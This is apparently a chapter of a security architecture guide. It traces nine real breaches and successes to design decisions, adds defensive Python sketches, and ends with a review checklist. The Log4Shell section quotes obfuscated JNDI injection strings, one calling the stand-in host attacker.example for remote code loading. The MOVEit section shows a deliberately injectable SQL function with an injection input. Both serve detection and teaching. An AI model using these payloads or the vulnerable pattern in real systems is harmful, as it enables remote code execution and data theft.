Section 10

Real-World Case Studies

Real-world security failures and successes offer concrete lessons for architects. Each case study below traces an incident to the architecture decisions that enabled or contained it, then distills the lessons.

Case Study 1: The Equifax Breach (2017)

What Happened

147 million records exposed due to an unpatched Apache Struts vulnerability (CVE-2017-5638). Attackers had access for 76 days before detection.

Architecture Failures

• Unpatched internet-facing server
• Expired SSL certificate on a traffic-inspection device left encrypted traffic unmonitored
• Flat network with poor segmentation allowed lateral movement
• Sensitive data not encrypted at rest

Lessons Learned

• Automated patch management is critical
• Network segmentation limits blast radius
• Encrypt sensitive data at rest
• Monitor SSL certificate expiration
• Defense in depth matters
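
The expired certificate in the Equifax case silently disabled traffic inspection for months. The sketch below shows one minimal way to monitor expiry with Python's standard `ssl` module. The 30-day threshold and the function names are illustrative assumptions, not a prescribed tool.

```python
import socket
import ssl
import time
from typing import Optional

WARN_DAYS = 30  # assumed alerting threshold; tune to your renewal process


def days_until_expiry(not_after: str, now: Optional[float] = None) -> int:
    """Whole days until a certificate's notAfter time (negative once expired).

    `not_after` uses the format returned by SSLSocket.getpeercert(),
    e.g. "Jan 11 00:00:00 2030 GMT".
    """
    expiry = ssl.cert_time_to_seconds(not_after)
    current = time.time() if now is None else now
    return int((expiry - current) // 86400)


def needs_renewal(not_after: str, now: Optional[float] = None,
                  warn_days: int = WARN_DAYS) -> bool:
    return days_until_expiry(not_after, now) < warn_days


def fetch_not_after(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Read the notAfter field of a live endpoint's certificate.

    The default context verifies the chain, so an already-expired certificate
    raises ssl.SSLCertVerificationError, which should itself trigger an alert.
    """
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()["notAfter"]
```

In practice a scheduler would call `fetch_not_after` for every monitored endpoint, including internal inspection appliances, and alert when `needs_renewal` returns True.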

Case Study 2: Capital One Breach (2019)

What Happened

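106 million records exposed via a server-side request forgery (SSRF) attack against a misconfigured web application firewall (WAF) running in AWS. The attacker used it to retrieve the WAF instance's IAM role credentials from the EC2 metadata service, and that overly permissive role granted access to S3 buckets.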

Architecture Failures

• WAF role had excessive S3 permissions
• WAF misconfiguration let attacker-supplied requests reach the metadata service (SSRF)
• IMDSv1 allowed credential theft
• No detection of unusual API calls
• Sensitive data in S3 not adequately protected

Lessons Learned

• Apply least privilege to all IAM roles
• Enforce IMDSv2 to mitigate SSRF-based credential theft
• Monitor CloudTrail for anomalous API activity
• Regular IAM permission audits
• Cloud-native security tools matter
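
Regular IAM audits can start with a simple lint for wildcard grants like the WAF role's broad S3 access. The sketch below works on IAM policy JSON already exported from an account; it is a deliberately narrow check under stated assumptions (it ignores `NotAction`, `NotResource`, and `Condition`), not a substitute for a full policy analyzer.

```python
from typing import Any, Dict, List, Union


def _as_list(value: Union[str, List[str]]) -> List[str]:
    # IAM allows Action/Resource to be a single string or a list of strings.
    return [value] if isinstance(value, str) else list(value)


def find_overly_broad(policy: Dict[str, Any]) -> List[str]:
    """Flag Allow statements that grant wildcard actions or resources.

    Deliberately simple: ignores NotAction/NotResource and Conditions,
    which a real audit must also evaluate.
    """
    findings: List[str] = []
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be an object
        statements = [statements]
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*" or action.endswith(":*"):
                findings.append(f"Statement {i}: wildcard action {action!r}")
        for resource in _as_list(stmt.get("Resource", [])):
            if resource == "*" or resource.endswith(":*"):
                findings.append(f"Statement {i}: wildcard resource {resource!r}")
    return findings
```

A policy granting `"s3:*"` on `"*"` produces two findings, while one scoped to `s3:GetObject` on a single bucket path produces none.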

Case Study 3: SolarWinds Supply Chain Attack (2020)

What Happened

Nation-state attackers compromised SolarWinds' build system, injecting the SUNBURST backdoor into Orion software updates. Up to 18,000 customers installed the trojanized update.

Architecture Failures

• Build server compromise went undetected
• Code signing attested the tampered build, because the malware was injected before signing
• Trusted software had excessive network access
• Minimal monitoring of outbound traffic
• C2 traffic masqueraded as legitimate Orion Improvement Program traffic, evading detection

Lessons Learned

• Secure the software supply chain
• Reproducible builds for verification
• Monitor build system integrity
• Zero Trust for internal software too
• Limit network access of monitoring tools
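
Reproducible builds let a second, independently controlled environment rebuild the same source and compare outputs; a tampered build server should then produce a mismatch. The comparison step can be sketched as below, assuming the toolchain is already deterministic (the hard part, not shown). The function names are illustrative.

```python
import hashlib
from pathlib import Path
from typing import Union

PathLike = Union[str, Path]


def sha256_file(path: PathLike, chunk_size: int = 65536) -> str:
    """Stream a file through SHA-256 so large artifacts need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def builds_match(primary_artifact: PathLike, independent_artifact: PathLike) -> bool:
    """True only if two independently produced builds are bit-for-bit identical."""
    return sha256_file(primary_artifact) == sha256_file(independent_artifact)
```

A mismatch does not say which build is compromised, only that release should stop until someone investigates.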

Case Study 4: Log4Shell (2021)

What Happened

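CVE-2021-44228: a critical RCE in Apache Log4j 2 (CVSS 10.0). Attacker-controlled strings that reached a log message could trigger JNDI lookups that loaded and executed remote code. The affected versions (2.0-beta9 through 2.14.1) were embedded in a vast number of Java applications and products.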

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1059.004 (Unix Shell), T1105 (Ingress Tool Transfer)

Architecture Failures

• Logging library had network call capability (violates economy of mechanism)
• No SBOM — orgs didn't know where Log4j was deployed
• Egress filtering not enforced (allowed LDAP/RMI outbound)
• WAFs bypassed with obfuscated lookups (e.g., ${${lower:j}ndi:ldap://...})

Lessons Learned

• Maintain SBOMs for all applications
• Restrict egress traffic by default
• Libraries should follow least privilege
• Defense in depth — patching alone isn't enough
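
Obfuscation defeated WAFs because a rule matching the literal string `${jndi:` never sees it until Log4j resolves nested lookups. The sketch below illustrates a detection heuristic that approximates only a few lookup forms (`lower`, `upper`, and the `:-` default-value syntax) before matching. It is an assumption-laden approximation, not Log4j's actual resolver, and it complements patching and egress filtering rather than replacing them.

```python
import re

# An "innermost" lookup: "${...}" whose body contains no "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Approximate a few Log4j 2 lookup forms seen in obfuscated payloads."""
    key, _, rest = body.partition(":")
    if key.lower() == "lower":
        return rest.lower()
    if key.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        # Default-value syntax, e.g. ${::-j} or ${env:UNSET:-j}, yields the default.
        return body.split(":-", 1)[1]
    return ""  # other lookups (date, env, ...) are dropped for detection purposes


def contains_jndi_lookup(text: str, max_rounds: int = 20) -> bool:
    """Resolve nested lookups from the inside out, then look for ${jndi:...}."""
    for _ in range(max_rounds):
        bodies = _INNERMOST.findall(text)
        if not bodies:
            return False
        if any(b.lower().startswith("jndi:") for b in bodies):
            return True
        text = _INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
    return True  # pathologically deep nesting is itself suspicious
```

For example, `${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}` collapses to `${jndi:rmi://attacker.example/a}` on the second pass and is flagged.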

Case Study 5: Okta / Lapsus$ (2022)

What Happened

Lapsus$ compromised a third-party support contractor's laptop, gaining access to Okta's internal admin tools. Up to 366 Okta customers' tenants were potentially affected.

MITRE ATT&CK: T1199 (Trusted Relationship), T1078 (Valid Accounts), T1552 (Unsecured Credentials)

Architecture Failures

• Third-party contractor had admin-level access
• No separation of privilege for support tools
• Delayed incident disclosure (2 months)
• Insufficient access logging on contractor sessions

Lessons Learned

• Apply Zero Trust to third-party access
• Time-boxed, audited contractor sessions
• Separation of duties for admin tools
• Rapid incident communication to customers
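
Time-boxed, audited contractor sessions can be modeled as grants that carry an explicit scope set and expiry, with every decision logged. The broker below is a hypothetical sketch: the class names, the 4-hour default TTL, and scope strings like `view_tickets` and `reset_mfa` are assumptions. High-risk scopes would, under separation of duties, be issued only through a separate approval path, which is not modeled here.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import FrozenSet, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ContractorGrant:
    principal: str
    scopes: FrozenSet[str]
    expires_at: datetime


@dataclass
class AccessBroker:
    """Hypothetical broker: every decision is time-boxed and audited."""
    audit_log: List[Tuple[str, str, str, bool]] = field(default_factory=list)

    def issue(self, principal: str, scopes: Iterable[str],
              ttl: timedelta = timedelta(hours=4),
              now: Optional[datetime] = None) -> ContractorGrant:
        now = now or datetime.now(timezone.utc)
        return ContractorGrant(principal, frozenset(scopes), now + ttl)

    def check(self, grant: ContractorGrant, scope: str,
              now: Optional[datetime] = None) -> bool:
        now = now or datetime.now(timezone.utc)
        # Deny once the session window closes, or for any scope not granted.
        allowed = now < grant.expires_at and scope in grant.scopes
        # Log denials too; they are often the earliest sign of misuse.
        self.audit_log.append((now.isoformat(), grant.principal, scope, allowed))
        return allowed
```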

Case Study 6: MOVEit Transfer (2023)

What Happened

CVE-2023-34362 — SQL injection zero-day in Progress MOVEit Transfer exploited by Cl0p ransomware gang. 2,500+ organizations affected, 60M+ individuals' data stolen.

MITRE ATT&CK: T1190 (Exploit Public-Facing App), T1505.003 (Web Shell), T1567 (Exfiltration Over Web Service)

Architecture Failures

• SQL injection in 2023: queries built from untrusted input instead of parameterized statements
• Web shell deployment not detected
• File transfer app exposed directly to the internet, often without a WAF
• Mass data exfiltration went unnoticed
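
The standard defense against SQL injection is binding input as query parameters rather than splicing it into SQL text. The contrast below uses Python's built-in `sqlite3` as a stand-in database; the `transfers` table and function names are hypothetical and do not reflect MOVEit's actual schema or code.

```python
import sqlite3
from typing import List, Tuple


def find_transfers_unsafe(conn: sqlite3.Connection, owner: str) -> List[Tuple[str]]:
    # VULNERABLE: user input is spliced into the SQL text, so quotes in
    # `owner` change the query's structure.
    sql = f"SELECT name FROM transfers WHERE owner = '{owner}'"
    return conn.execute(sql).fetchall()


def find_transfers_safe(conn: sqlite3.Connection, owner: str) -> List[Tuple[str]]:
    # The "?" placeholder binds `owner` as a value; it is never parsed as SQL.
    return conn.execute(
        "SELECT name FROM transfers WHERE owner = ?", (owner,)
    ).fetchall()
```

With the input `nobody' OR '1'='1`, the unsafe version returns every row in the table, while the safe version returns nothing.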

Lessons Learned

• Never expose file transfer tools directly to the internet
• WAF + IDS in front of all public-facing apps
• Monitor for web shell indicators
• DLP to detect bulk data exfiltration
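
Bulk exfiltration usually shows up as outbound volume far above a host's normal level. A minimal volume-based sketch follows, assuming per-host byte counts per time window are already collected (for example, from flow logs). The 100 MB floor and the mean + 3σ rule are illustrative assumptions; real DLP also inspects content and destinations.

```python
import statistics
from typing import Dict, List

MIN_ALERT_BYTES = 100_000_000  # assumed floor (~100 MB) to suppress noise on quiet hosts


def flag_bulk_egress(history: Dict[str, List[int]],
                     current: Dict[str, int],
                     k: float = 3.0,
                     min_bytes: int = MIN_ALERT_BYTES) -> List[str]:
    """Return hosts whose outbound bytes in the current window look anomalous.

    A host is flagged when it exceeds both the absolute floor and its own
    baseline (mean + k * population standard deviation of past windows).
    Hosts without enough history are judged on the floor alone.
    """
    flagged = []
    for host, observed in current.items():
        if observed < min_bytes:
            continue
        past = history.get(host, [])
        if len(past) < 2:
            flagged.append(host)
            continue
        threshold = statistics.mean(past) + k * statistics.pstdev(past)
        if observed > threshold:
            flagged.append(host)
    return sorted(flagged)
```

Comparing each host against its own baseline matters for file transfer servers, whose normal volume is already high.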

Case Study 7: Microsoft Storm-0558 (2023)

What Happened

A China-based threat actor obtained a Microsoft account (MSA) consumer signing key, which Microsoft's investigation initially attributed to a crash dump, and used it to forge Azure AD tokens and access government email accounts.

MITRE ATT&CK: T1552.004 (Private Keys), T1606 (Forge Web Credentials), T1114.002 (Remote Email Collection)

Architecture Failures

• Signing key in crash dump (dev environment leak)
• Consumer key accepted by enterprise service (validation gap)
• No key rotation forced after potential exposure
• Key audit logs (e.g., MailItemsAccessed) required premium licensing, so many affected tenants lacked them

Lessons Learned

• Strict key isolation between consumer/enterprise
• Sanitize crash dumps for sensitive material
• Token validation must check issuer scope
• Log access must be available to all customers
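
A valid signature is not sufficient on its own; the validator must also confirm that the signing key and issuer belong to the token population the service serves. The sketch below shows those scope checks, assuming a real JWT library has already verified the signature. The key registry, key IDs, and issuer URL format are hypothetical.

```python
from typing import Dict, Tuple

# Hypothetical key registry: each signing key is tagged with the only
# token population it may sign for.
KEY_SCOPES: Dict[str, str] = {
    "consumer-key-1": "consumer",
    "enterprise-key-7": "enterprise",
}

# Hypothetical issuer format for enterprise tenants.
ENTERPRISE_ISSUER = "https://login.example.com/{tenant}/"


def check_enterprise_token(header: Dict[str, str], claims: Dict[str, str],
                           expected_tenant: str) -> Tuple[bool, str]:
    """Scope checks to run AFTER a JWT library has verified the signature.

    A validly signed token from the wrong key population or issuer
    must still be rejected.
    """
    scope = KEY_SCOPES.get(header.get("kid", ""))
    if scope is None:
        return False, "unknown signing key"
    if scope != "enterprise":
        return False, f"{scope} key presented to enterprise service"
    expected_iss = ENTERPRISE_ISSUER.format(tenant=expected_tenant)
    if claims.get("iss") != expected_iss:
        return False, "issuer does not match tenant"
    return True, "ok"
```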

Case Study 8: Cloudflare Thanksgiving 2023 (Positive)

What They Did Right

A likely nation-state attacker used one access token and three service account credentials stolen in the October 2023 Okta breach, which Cloudflare had failed to rotate, to access Cloudflare's self-hosted Atlassian server. Because of Cloudflare's Zero Trust architecture, the blast radius stayed minimal despite the initial access.

Why the Damage Was Limited

• Zero Trust segmentation: Atlassian couldn't reach production
• Detection within hours via anomalous access patterns
• Transparent public disclosure with full timeline
• "Code Red" remediation: rotated every production credential (more than 5,000), even those not known to be compromised

Key Architecture Decisions

• Assume breach mentality operationalized
• Network segmentation prevented lateral movement to production
• Comprehensive logging enabled rapid forensics
• Incident response plan executed within minutes
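
Rotating "every credential" is only as complete as the inventory behind it. A minimal sketch under assumed data: given a credential inventory with last-rotation timestamps, list everything not rotated since the incident. The `Credential` type and its fields are hypothetical.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, List


@dataclass(frozen=True)
class Credential:
    name: str
    kind: str            # e.g. "service_token", "service_account", "api_key"
    last_rotated: datetime


def stale_after_incident(inventory: Iterable[Credential],
                         incident_at: datetime) -> List[str]:
    """Names of credentials not rotated since the incident.

    Anything on this list must be treated as potentially compromised,
    whether or not it is known to have been exposed.
    """
    return sorted(c.name for c in inventory if c.last_rotated <= incident_at)
```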

Case Study 9: Secure Architecture Success - Google BeyondCorp

What They Did Right

After the Aurora attacks, Google rebuilt its security model. BeyondCorp eliminated the privileged corporate network perimeter and became one of the first large-scale Zero Trust implementations.

Architecture Decisions

• No trusted network—all access is identity-based
• Device trust established through inventory and health
• Access Proxy mediates all application access
• Context-aware access policies
• Works the same from office, home, or coffee shop
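
The core of the model is that the access proxy decides on identity and device state, never on network location. The sketch below illustrates such a context-aware decision. The policy structure, device attributes, and 14-day patch window are hypothetical, not Google's actual policy engine.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet


@dataclass(frozen=True)
class Device:
    device_id: str
    in_inventory: bool        # known to the device inventory service
    disk_encrypted: bool
    os_patch_age_days: int


@dataclass(frozen=True)
class AccessRequest:
    user: str
    groups: FrozenSet[str]
    device: Device
    source_network: str       # recorded for logging, never used for the decision


@dataclass(frozen=True)
class AppPolicy:
    allowed_groups: FrozenSet[str]
    max_patch_age_days: int


# Hypothetical per-application policies held by the access proxy.
POLICIES: Dict[str, AppPolicy] = {
    "payroll": AppPolicy(frozenset({"finance"}), max_patch_age_days=14),
}


def device_trusted(device: Device, max_patch_age_days: int) -> bool:
    return (device.in_inventory and device.disk_encrypted
            and device.os_patch_age_days <= max_patch_age_days)


def authorize(request: AccessRequest, app: str) -> bool:
    policy = POLICIES.get(app)
    if policy is None:
        return False  # default deny for unknown applications
    return (bool(request.groups & policy.allowed_groups)
            and device_trusted(request.device, policy.max_patch_age_days))
```

A finance user on a healthy laptop is allowed from a coffee shop, while the same user on an unpatched laptop is denied even inside the office.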

Results

• Eliminated VPN for most use cases
• Consistent security regardless of location
• Removed the privileged internal network as an attack surface
• Better user experience than VPN
• Became a widely referenced model for Zero Trust architectures

Architecture Review Template

Security Architecture Review Checklist

1. Data Security

☐ Data classification completed
☐ Encryption at rest for sensitive data (AES-256)
☐ TLS 1.2+ for all data in transit
☐ Key management strategy defined (KMS/HSM)
☐ Data retention and disposal policy

2. Identity & Access

☐ Authentication mechanism defined (OAuth 2.0/OIDC)
☐ MFA enforced for all human access
☐ Authorization model documented (RBAC/ABAC)
☐ Service-to-service auth specified (mTLS/JWT)
☐ Least privilege applied and verified
☐ Account lifecycle management (JIT, deprovisioning)

3. Network Security

☐ Trust boundaries identified and documented
☐ Network segmentation designed (VPC, subnets)
☐ Ingress/egress controls defined
☐ DDoS mitigation considered
☐ DNS security (DNSSEC, DoH/DoT)
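
"Ingress/egress controls defined" implies a default-deny egress policy with an explicit allowlist. The sketch below models only the policy decision; actual enforcement belongs in firewalls, security groups, or an egress proxy. The destinations listed are hypothetical.

```python
from typing import FrozenSet, Tuple

# Hypothetical allowlist: (destination host, port) pairs this workload may reach.
EGRESS_ALLOWLIST: FrozenSet[Tuple[str, int]] = frozenset({
    ("api.payments.example.com", 443),
    ("logs.internal.example", 6514),
})


def egress_allowed(host: str, port: int) -> bool:
    # Default deny: anything not explicitly listed is blocked, including
    # outbound LDAP (389) and RMI (1099) of the kind used in Log4Shell callbacks.
    return (host.lower().rstrip("."), port) in EGRESS_ALLOWLIST
```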

4. Application Security

☐ Input validation at every trust boundary
☐ OWASP Top 10 / API Top 10 mitigations
☐ Secrets management (no hardcoded credentials)
☐ Security headers configured (CSP, HSTS, XFO)
☐ Dependency scanning in CI/CD pipeline
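
The security-headers item can be verified automatically against captured HTTP responses. The sketch below is a minimal check of the three headers the checklist names. The validity rules are deliberately loose assumptions (for instance, it does not judge whether a CSP is actually strict).

```python
from typing import Callable, Dict, List

# Headers named in the checklist, with a minimal validity rule for each
# (assumed rules; tighten per application).
REQUIRED_HEADERS: Dict[str, Callable[[str], bool]] = {
    "content-security-policy": lambda v: bool(v.strip()),
    "strict-transport-security": lambda v: "max-age=" in v.lower(),
    "x-frame-options": lambda v: v.strip().upper() in {"DENY", "SAMEORIGIN"},
}


def missing_security_headers(headers: Dict[str, str]) -> List[str]:
    """Return checklist headers that are absent or have an unusable value."""
    # HTTP header names are case-insensitive, so normalize before lookup.
    normalized = {k.lower(): v for k, v in headers.items()}
    problems = []
    for name, is_valid in REQUIRED_HEADERS.items():
        value = normalized.get(name)
        if value is None or not is_valid(value):
            problems.append(name)
    return problems
```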

5. Operations & Resilience

☐ Logging and monitoring strategy (SIEM/XDR)
☐ Incident response plan documented and tested
☐ Backup and recovery tested (RTO/RPO defined)
☐ Patch management process with SLAs
☐ Supply chain security (SBOM, vendor review)
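
"Patch management process with SLAs" becomes enforceable once SLAs are data a script can check. The sketch below uses assumed SLA values and a hypothetical rule that internet-facing assets get half the normal window, reflecting the Equifax lesson; both are illustrations to adapt, not recommended numbers.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, Iterable, List

# Assumed remediation SLAs in days by severity; set these in your own policy.
PATCH_SLA_DAYS: Dict[str, int] = {"critical": 7, "high": 30, "medium": 90, "low": 180}


@dataclass(frozen=True)
class Finding:
    asset: str
    cve: str
    severity: str
    published: date
    internet_facing: bool = False


def overdue(findings: Iterable[Finding], today: date) -> List[str]:
    """Return 'asset:cve' for findings past their SLA.

    Hypothetical rule: internet-facing assets get half the normal window,
    since they are the first to be scanned and exploited.
    """
    late = []
    for f in findings:
        sla = PATCH_SLA_DAYS[f.severity]
        if f.internet_facing:
            sla //= 2
        if today > f.published + timedelta(days=sla):
            late.append(f"{f.asset}:{f.cve}")
    return late
```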

Document Your Decisions

Architecture Decision Records (ADRs) capture why security decisions were made. Future teams need to understand the context to avoid undoing security controls. See Reference Architectures for an ADR template.

Framework Alignment

MITRE ATT&CK: Techniques referenced per case study above
NIST CSF 2.0: RS (Respond), RC (Recover) — lessons for incident response
ISO 27002:2022: A.5.24 (Information Security Incident Management Planning and Preparation), A.5.25 (Assessment and Decision on Information Security Events)
Related: Security Frameworks → | Reference Architectures →
